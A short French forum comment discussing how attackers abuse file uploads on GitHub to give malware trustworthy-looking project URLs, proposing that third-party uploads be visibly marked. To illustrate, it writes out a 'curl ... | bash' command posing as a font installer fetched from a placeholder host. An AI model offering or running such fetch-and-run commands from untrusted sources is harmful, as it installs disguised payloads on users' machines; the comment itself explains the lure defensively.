• [^] # Re: faille?

    Posté par . En réponse au lien Des hackers profitent d'une faille technique de GitHub pour diffuser leur malware. Évalué à 7.

    Je suis d'accord et pas d'accord avec toi que le terme est tangent. Ce n'est pas une faille technique, mais ça exploite une faille humaine. Quand on voit comment ça se passe avec le phishing par mail, c'est plutôt astucieux. On nous habitue à vérifier les URLs dans les mails, etc... Et là ça fait des URLs toutes jolies.

    Il n'y a pas de mécanisme permettant de différencier qu'un fichier a été déposé par un membre du projet vs une personne random. Une petite icône à côté des fichiers posés par un tiers peut mitiger le problème, par exemple, ou un schéma un peu différent.

    Exemple :

    Pour installer la police de caractères ScreamingTurtle utilisée par YoupiScanner, faites simplement :

    curl https://example.com/microsoft/msfonts/files/abc123def456/screamingturtle-font-installer.sh | bash1

    Si l'URL était comme ceci :

    curl https://example.com/microsoft/msfonts/comments-uploads/files/abc123def456/screamingturtle-font-installer.sh | bash

    peut-être que dans 2% des cas on ne download pas le fichier.


    1. rien de tel qu'un curl | bash pour mettre tout le monde d'accord :D